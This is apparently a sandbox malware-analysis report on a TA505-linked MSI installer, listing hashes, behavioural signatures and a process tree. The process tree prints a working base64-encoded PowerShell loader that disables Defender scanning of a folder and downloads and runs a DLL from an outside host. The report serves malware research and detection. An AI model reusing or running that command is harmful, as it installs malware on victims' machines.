Analysis
-
max time kernel
1710s -
max time network
1619s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
27-10-2022 00:32
Static task
static1
Behavioral task
behavioral1
Sample
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
Resource
win10v2004-20220812-en
General
-
Target
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi
-
Size
9.7MB
-
MD5
bcdf12044dc371543ed7b14c4bf8a586
-
SHA1
4cb4b2b5978500d17526cbd238717781249a023c
-
SHA256
fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124
-
SHA512
c95bad64458fe6bb80bd94419338d115f580ce6cfb4b89f8fc33ea51b97fcb4bfad7ec0c82914d5ef5152d722f36fe948a135c2261bb0160c6a04c3ccaca3195
-
SSDEEP
196608:Ie9vBbrDJa8hjX5FEhDUt5D4oJ+zLzfVV:/bZL526HD4Vn
Malware Config
Signatures
-
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1720 powershell.exe 6 1720 powershell.exe 8 1720 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1000 MSI1FD8.tmp -
Loads dropped DLL 15 IoCs
pid Process 468 MsiExec.exe 468 MsiExec.exe 468 MsiExec.exe 468 MsiExec.exe 1160 msiexec.exe 2032 rundll32.exe 1304 rundll32.exe 1516 rundll32.exe 1372 rundll32.exe 856 rundll32.exe 1800 rundll32.exe 1860 rundll32.exe 1536 rundll32.exe 1800 rundll32.exe 908 rundll32.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\Installer\6c121b.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI12B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI14BB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1873.tmp msiexec.exe File created C:\Windows\Installer\6c121d.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI1DD2.tmp msiexec.exe File created C:\Windows\Installer\6c121b.msi msiexec.exe File opened for modification C:\Windows\Installer\6c121d.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI1FD8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI197E.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1160 msiexec.exe 1160 msiexec.exe 1720 powershell.exe 1720 powershell.exe 1720 powershell.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeShutdownPrivilege 1324 msiexec.exe Token: SeIncreaseQuotaPrivilege 1324 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeSecurityPrivilege 1160 msiexec.exe Token: SeCreateTokenPrivilege 1324 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1324 msiexec.exe Token: SeLockMemoryPrivilege 1324 msiexec.exe Token: SeIncreaseQuotaPrivilege 1324 msiexec.exe Token: SeMachineAccountPrivilege 1324 msiexec.exe Token: SeTcbPrivilege 1324 msiexec.exe Token: SeSecurityPrivilege 1324 msiexec.exe Token: SeTakeOwnershipPrivilege 1324 msiexec.exe Token: SeLoadDriverPrivilege 1324 msiexec.exe Token: SeSystemProfilePrivilege 1324 msiexec.exe Token: SeSystemtimePrivilege 1324 msiexec.exe Token: SeProfSingleProcessPrivilege 1324 msiexec.exe Token: SeIncBasePriorityPrivilege 1324 msiexec.exe Token: SeCreatePagefilePrivilege 1324 msiexec.exe Token: SeCreatePermanentPrivilege 1324 msiexec.exe Token: SeBackupPrivilege 1324 msiexec.exe Token: SeRestorePrivilege 1324 msiexec.exe Token: SeShutdownPrivilege 1324 msiexec.exe Token: SeDebugPrivilege 1324 msiexec.exe Token: SeAuditPrivilege 1324 msiexec.exe Token: SeSystemEnvironmentPrivilege 1324 msiexec.exe Token: SeChangeNotifyPrivilege 1324 msiexec.exe Token: SeRemoteShutdownPrivilege 1324 msiexec.exe Token: SeUndockPrivilege 1324 msiexec.exe Token: SeSyncAgentPrivilege 1324 msiexec.exe Token: SeEnableDelegationPrivilege 1324 msiexec.exe Token: SeManageVolumePrivilege 1324 msiexec.exe Token: SeImpersonatePrivilege 1324 msiexec.exe Token: SeCreateGlobalPrivilege 1324 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeRestorePrivilege 1160 msiexec.exe Token: SeTakeOwnershipPrivilege 1160 msiexec.exe Token: SeDebugPrivilege 1720 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1324 msiexec.exe 1324 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 468 1160 msiexec.exe 28 PID 1160 wrote to memory of 1000 1160 msiexec.exe 29 PID 1160 wrote to memory of 1000 1160 msiexec.exe 29 PID 1160 wrote to memory of 1000 1160 msiexec.exe 29 PID 1000 wrote to memory of 1720 1000 MSI1FD8.tmp 30 PID 1000 wrote to memory of 1720 1000 MSI1FD8.tmp 30 PID 1000 wrote to memory of 1720 1000 MSI1FD8.tmp 30 PID 1720 wrote to memory of 1800 1720 powershell.exe 32 PID 1720 wrote to memory of 1800 1720 powershell.exe 32 PID 1720 wrote to memory of 1800 1720 powershell.exe 32 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 1800 wrote to memory of 2032 1800 rundll32.exe 33 PID 2032 wrote to memory of 1756 2032 rundll32.exe 34 PID 2032 wrote to memory of 1756 2032 rundll32.exe 34 PID 2032 wrote to memory of 1756 2032 rundll32.exe 34 PID 2032 wrote to memory of 1756 2032 rundll32.exe 34 PID 1828 wrote to memory of 1764 1828 explorer.exe 36 PID 1828 wrote to memory of 1764 1828 explorer.exe 36 PID 1828 wrote to memory of 1764 1828 explorer.exe 36 PID 1764 wrote to memory of 988 1764 cmd.exe 38 PID 1764 wrote to memory of 988 1764 cmd.exe 38 PID 1764 wrote to memory of 988 1764 cmd.exe 38 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 988 wrote to memory of 1304 988 rundll32.exe 39 PID 1304 wrote to memory of 1976 1304 rundll32.exe 40 PID 1304 wrote to memory of 1976 1304 rundll32.exe 40 PID 1304 wrote to memory of 1976 1304 rundll32.exe 40 PID 1304 wrote to memory of 1976 1304 rundll32.exe 40 PID 780 wrote to memory of 1332 780 explorer.exe 42 PID 780 wrote to memory of 1332 780 explorer.exe 42 PID 780 wrote to memory of 1332 780 explorer.exe 42 PID 1332 wrote to memory of 1556 1332 cmd.exe 44 PID 1332 wrote to memory of 1556 1332 cmd.exe 44 PID 1332 wrote to memory of 1556 1332 cmd.exe 44 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1556 wrote to memory of 1516 1556 rundll32.exe 45 PID 1516 wrote to memory of 112 1516 rundll32.exe 46 PID 1516 wrote to memory of 112 1516 rundll32.exe 46 PID 1516 wrote to memory of 112 1516 rundll32.exe 46 PID 1516 wrote to memory of 112 1516 rundll32.exe 46 PID 2028 wrote to memory of 564 2028 explorer.exe 48 PID 2028 wrote to memory of 564 2028 explorer.exe 48 PID 2028 wrote to memory of 564 2028 explorer.exe 48
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fc081ae799c663668e679680b8aa7ff825458beff211d0be1848b96905a31124.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1324
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 24FC32FC34A15C6E8546AAD08CA0760E2⤵
- Loads dropped DLL
PID:468
-
-
C:\Windows\Installer\MSI1FD8.tmp"C:\Windows\Installer\MSI1FD8.tmp" /RunAsAdmin /HideWindow powershell.exe -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE4AZQBvAHMAbwBmAHQAXABJAG4AcwB0AGEAbABsAGUAcgAiACkALgBQAGEAdABoACAALQBsAGUAYQBmADsADQAKACQAZABpAHIAIAA9ACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQA7AA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABkAGkAcgA7AA0ACgAkAGYAbgAgAD0AIAAkAGQAaQByACAAKwAgACIAXAAiACAAKwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApAC4AVABvAFMAdAByAGkAbgBnACgAIgB4ADgAIgApACAAKwAgACIALgBkAGEAdAAiAA0ACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAZAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALQBjAGQAbgAuAGMAbwBtACIAOwANAAoAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAZAAgACsAIAAiAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAPwBmAD0ATABkAHIALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA0ACgAkAGYAbgAgAD0AIAAkAGYAbgAgACsAIAAiAC4AbQBzAGkAIgA7AA0ACgAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABkACAAKwAgACIALwBkAGUAYwBvAHkALwAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoACQAZgBuACkAOwA=2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -enc JABmAHIAbwBtACAAPQAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAATIFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE4AZQBvAHMAbwBmAHQAXABJAG4AcwB0AGEAbABsAGUAcgAiACkALgBQAGEAdABoACAALQBsAGUAYQBmADsADQAKACQAZABpAHIAIAA9ACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQA7AA0ACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABkAGkAcgA7AA0ACgAkAGYAbgAgAD0AIAAkAGQAaQByACAAKwAgACIAXAAiACAAKwAgACgARwBlAHQALQBSAGEAbgBkAG8AbQApAC4AVABvAFMAdAByAGkAbgBnACgAIgB4ADgAIgApACAAKwAgACIALgBkAGEAdAAiAA0ACgAkAHcAYwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAZAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALQBjAGQAbgAuAGMAbwBtACIAOwANAAoAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAZAAgACsAIAAiAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAPwBmAD0ATABkAHIALgBkAGwAbAAmAGYAcgBvAG0APQAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgAkAHIAYQB3ACAAPQAgACIATQBaACIAIAArACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAtAFAAYQB0AGgAIAAkAGYAbgAgAC0AUgBhAHcAKQAuAFIAZQBtAG8AdgBlACgAMAAsACAAMgApADsADQAKAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACgAJABmAG4AKQAgAC0ATgBvAE4AZQB3AGwAaQBuAGUAIAAtAFYAYQBsAHUAZQAgACQAcgBhAHcADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAJwAiACcAIAArACAAJABmAG4AIAArACAAJwAiACwARABsAGwAUgBlAGcAaQBzAHQAZQByAFMAZQByAHYAZQByACcAKQA7AA0ACgAkAGYAbgAgAD0AIAAkAGYAbgAgACsAIAAiAC4AbQBzAGkAIgA7AA0ACgAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABkACAAKwAgACIALwBkAGUAYwBvAHkALwAiACAAKwAgACQAZgByAG8AbQAsACAAJABmAG4AKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoACQAZgBuACkAOwA=3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\ProgramData\287072c7.dat",DllRegisterServer5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\10C4.tmp.bat"6⤵PID:1756
-
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10C4.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\D663.tmp.bat"5⤵PID:1976
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\D663.tmp.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\9B76.tmp.bat"5⤵PID:112
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\9B76.tmp.bat" "2⤵PID:564
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:536
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:1372 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\60A8.tmp.bat"5⤵PID:828
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1700
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\60A8.tmp.bat" "2⤵PID:1832
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:988
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:856 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\251E.tmp.bat"5⤵PID:1960
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2024
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\251E.tmp.bat" "2⤵PID:1728
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:1808
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:1800 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\EA31.tmp.bat"5⤵PID:2036
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1732
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EA31.tmp.bat" "2⤵PID:556
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:1864
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:1860 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\AE89.tmp.bat"5⤵PID:1248
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1976
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\AE89.tmp.bat" "2⤵PID:188
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:1380
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:1536 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\736D.tmp.bat"5⤵PID:976
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:2044
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\736D.tmp.bat" "2⤵PID:1288
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:880
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:1800 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe "C:\Users\Admin\AppData\Local\Temp\387F.tmp.bat"5⤵PID:572
-
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:304
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\387F.tmp.bat" "2⤵PID:1956
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer3⤵PID:1864
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\ProgramData\287072c7.dat",DllRegisterServer4⤵
- Loads dropped DLL
PID:908
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD57a40e437ecccd8a6c3bde2e73484b65e
SHA11969435a5a94f27ad76b0a10e4265394a5686736
SHA256aa567002fd7c7a96f313471e6bea39a417f682609b72359ce1946362c845c9cf
SHA51289c3f861c9648cbb6c0b0d2324f7c0a9b06abd0f262ece01577c979356e657768ae630d3f331b2c1142677916bbaa537f9bc6fc1a630b6ac86f530539de69c55
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
MD5d752604980c92b3fe120c11e0c53ac9e
SHA1d412a446182be0f0ceffcfe4d8b5e3e51ee98c0e
SHA256c0147bc13d498a50df65baea0e24f652ca4599364a6ed48b83dfb6903ba493f6
SHA51292cdcad322764d531f15a234017ae5849e75e3a56e87963e04fec3f6c7c99c8866653938abc443ddf55f57c8162baf5d49e52c709a79cbceb692a70d03dd77e0
-
Filesize
87B
